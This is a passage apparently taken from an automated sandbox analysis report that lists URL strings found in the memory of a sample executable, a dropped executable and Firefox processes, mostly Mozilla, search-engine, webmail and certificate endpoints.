Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DEF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestRemoteSettingsDataType
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DEF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestRemoteSettingsEnabled
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DEF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/weatherKeywords
Source: firefox.exe, 0000001B.00000003.2678449963.000001C178050000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2679591143.000001C177458000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2678449963.000001C17807F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2679591143.000001C177443000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2679591143.000001C177462000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2678449963.000001C1780B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2678449963.000001C1780B6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2774091351.000001C174804000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2678449963.000001C178069000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2771686385.000001C1746CA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2784200598.000001C17503B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2749174259.000001C171944000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2774091351.000001C17483B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2678449963.000001C178070000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2778187093.000001C174C03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2774091351.000001C174807000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2697397677.000001C175776000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2607713680.000001C1746DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2678449963.000001C178039000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2757990027.000001C1726EF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2603876915.000001C175780000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: file.exe, 00000000.00000003.1710536218.0000000005A41000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2483187164.000000000537D000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2630536673.00000000058A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000003.1710536218.0000000005A41000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2483187164.000000000537D000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2630536673.00000000058A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: firefox.exe, 0000001B.00000002.2742669039.000001C17097D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%shttp://compose.mail.yahoo.co.jp/ym/Compose?To=%s_finalizeInter
Source: firefox.exe, 0000001B.00000002.2757990027.000001C1726EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%sw
Source: firefox.exe, 0000001B.00000002.2749174259.000001C17196C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0.
Source: firefox.exe, 0000001B.00000003.2679591143.000001C177462000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0W
Source: firefox.exe, 0000001B.00000002.2749174259.000001C17196C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2679591143.000001C177462000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.o.lencr.org0
Source: firefox.exe, 0000001B.00000002.2742669039.000001C17097D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%sextractScheme/fixupChangedProtocol
Source: firefox.exe, 0000001B.00000002.2757990027.000001C1726EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%sy
Source: firefox.exe, 0000001B.00000002.2742669039.000001C17097D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%s
Source: firefox.exe, 0000001B.00000002.2757990027.000001C1726EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%su
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DAF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2681293561.000001C175654000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 0000001B.00000002.2778187093.000001C174C03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul8
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulCan
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://browser/content/places/browser
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://global/content/elements/autoco
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://global/content/elements/moz-in
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://global/content/shopping/Shoppi
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xuldedupeLogins/shouldReplaceExisting:
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulhttp://www.mozilla.org/keymaster/gateke
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xuloncommand=closebuttoncommand
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource:///modules/BrowserSearchTeleme
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource:///modules/PartnerLinkAttribut
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource:///modules/sessionstore/Sessio
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource://activity-stream/lib/ASRouter
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource://gre/modules/ExtensionSearchH
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource://gre/modules/PrivateBrowsingU
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulsrc=image
Source: firefox.exe, 00000020.00000002.2730820212.000002B797CFD000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2676983185.000002B797CFD000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2681525052.000002B797CFD000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2675377551.000002B797CFD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.videolan.org/x264.html
Source: file.exe, 00000000.00000003.1710536218.0000000005A41000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2483187164.000000000537D000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2630536673.00000000058A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: file.exe, 00000000.00000003.1710536218.0000000005A41000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2483187164.000000000537D000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2630536673.00000000058A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 0000001B.00000002.2785119034.000001C1752DB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://youtube.com/
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.malware-error.mozilla.com/?url=
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.phish-error.mozilla.com/?url=
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.phish-report.mozilla.com/?url=
Source: firefox.exe, 0000001B.00000003.2598025300.000001C174877000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2762165135.000001C1731A0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000003.2597108445.000001C17481F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2597604309.000001C17485A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2597314679.000001C17483C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2596897657.000001C174600000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.duckduckgo.com/ac/initializeAttributeInheritance
Source: file.exe, 00000000.00000003.1681589317.0000000005A57000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2454915918.00000000052B9000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2586097370.000000000589C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: firefox.exe, 0000001B.00000002.2734125620.000001C166828000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accoun.google.com/v3/signin/challeng
Source: firefox.exe, 0000001B.00000002.2757990027.000001C172674000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2749174259.000001C171903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/settings/clients
Source: firefox.exe, 0000001B.00000002.2778559508.000001C174DCD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.comK
Source: firefox.exe, 0000001B.00000003.2678449963.000001C178039000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 0000001B.00000002.2733122243.000001C164C03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/language-tools/
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search-engines/
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search?q=%TERMS%&platform=%OS%&appver=%VERSION%
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/themes
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org_migrateXULStoreForDocumentdevice-connected-notificationbrowser.handlers.m
Source: firefox.exe, 0000001B.00000002.2780914101.000001C174EE3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2746480848.000001C170D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2780914101.000001C174E6C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ads.stickyadstv.com/firefox-etpUsing
Source: firefox.exe, 0000001B.00000002.2749174259.000001C171978000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2757990027.000001C172674000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://amazon.com
Source: firefox.exe, 0000001B.00000002.2785119034.000001C1752DB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://amazon.com/
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://api.accounts.firefox.com/v1
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://apps.apple.com/app/firefox-private-safe-browser/id989804926
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://apps.apple.com/us/app/firefox-private-network-vpn/id1489407738
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/GMP/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VER
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2733122243.000001C164C11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2678449963.000001C178039000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/%blockID%.html
Source: firefox.exe, 0000001B.00000002.2736051759.000001C1703AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723930872.00000154760CA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2722359273.000002B7970E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: firefox.exe, 0000001B.00000002.2736051759.000001C1703AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723930872.00000154760CA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2722359273.000002B7970E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: firefox.exe, 0000001B.00000002.2749174259.000001C171978000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2749174259.000001C17191A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mo
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DAF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180Required
Source: file.exe, 00000000.00000003.1681589317.0000000005A57000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2454915918.00000000052B9000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2586097370.000000000589C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.1681589317.0000000005A57000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2454915918.00000000052B9000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2586097370.000000000589C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.1681589317.0000000005A57000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2454915918.00000000052B9000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2586097370.000000000589C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170D72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2762165135.000001C1731A0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000003.2597108445.000001C17481F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2597604309.000001C17485A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2597314679.000001C17483C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.2596897657.000001C174600000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 0000001B.00000002.2778559508.000001C174DA9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net
Source: firefox.exe, 0000001B.00000002.2778559508.000001C174DA9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net/
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://content.cdn.mozilla.net
Source: firefox.exe, 0000001B.00000002.2736051759.000001C1703AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723930872.00000154760CA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2722359273.000002B7970E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: firefox.exe, 0000001B.00000002.2736051759.000001C1703AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723930872.00000154760CA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2722359273.000002B7970E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: firefox.exe, 0000001B.00000002.2746480848.000001C170DAF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://coverage.mozilla.org
Source: firefox.exe, 0000001B.00000002.2733122243.000001C164C11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://crash-stats.mozilla.org/report/index/
Source: firefox.exe, 0000001B.00000003.2674078299.000001C17CD4F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crbug.com/993268
Source: firefox.exe, 0000001B.00000002.2754915187.000001C171E10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2723376989.0000015475EB0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000020.00000002.2726881241.000002B7975A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://dap-02.api.divviup.org
Source: firefox.exe, 0000001B.00000002.2773817495.000001C174760000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTabPlease
Source: firefox.exe, 0000001B.00000002.2773817495.000001C174760000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureOffscreenCanvas.toBlob()
